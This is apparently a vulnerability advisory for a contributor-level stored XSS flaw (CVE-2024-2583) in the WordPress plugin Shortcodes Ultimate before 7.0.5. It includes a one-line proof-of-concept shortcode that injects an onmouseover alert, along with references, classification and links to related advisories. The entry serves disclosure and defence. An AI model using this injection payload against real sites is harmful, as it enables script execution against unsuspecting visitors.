WordPress Plugin Vulnerabilities

Shortcodes Ultimate < 7.0.5 - Contributor+ Stored XSS

Description

The plugin does not properly escape some of its shortcodes attributes before they are echoed back to users, making it possible for users with the contributor role to conduct Stored XSS attacks.

Proof of Concept

[su_note note_color='123"onmouseover="alert(/XSS/)"' text_color='1' radius='1' class='1' id="1"]Note text[/su_note]

Affects Plugins

Plugin icon
shortcodes-ultimate
Fixed in 7.0.5

References

CVE
CVE-2024-2583
URL
https://research.cleantalk.org/cve-2024-2583/

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher
Dmitrii Ignatyev
Submitter
Dmitrii Ignatyev
Submitter website
https://research.cleantalk.org
Verified
Yes
WPVDB ID
98d8c713-e8cd-4fad-a8fb-7a40db2742a2

Timeline

Publicly Published
2024-03-23 (about 1 months ago)
Added
2024-03-23 (about 1 months ago)
Last Updated
2024-03-26 (about 1 months ago)

Other

Published
Title
Published
2021-09-22
Title
Cookie Bar < 1.8.9 - Admin+ Stored Cross-Site Scripting
Published
2023-11-07
Title
Recently viewed and most viewed products <= 1.1.1 - Authenticated (Shop Manager+) Stored Cross-Site Scripting
Published
2023-05-15
Title
Drop Shadow Boxes < 1.7.11 - Contributor+ Cross-Site Scripting
Published
2023-11-29
Title
Social Share Buttons & Analytics Plugin < 4.4 - Admin+ Stored XSS
Published
2024-03-28
Title
GS Testimonial Slider < 3.1.5 - Authenticated (Contributor+) Stored Cross-Site Scripting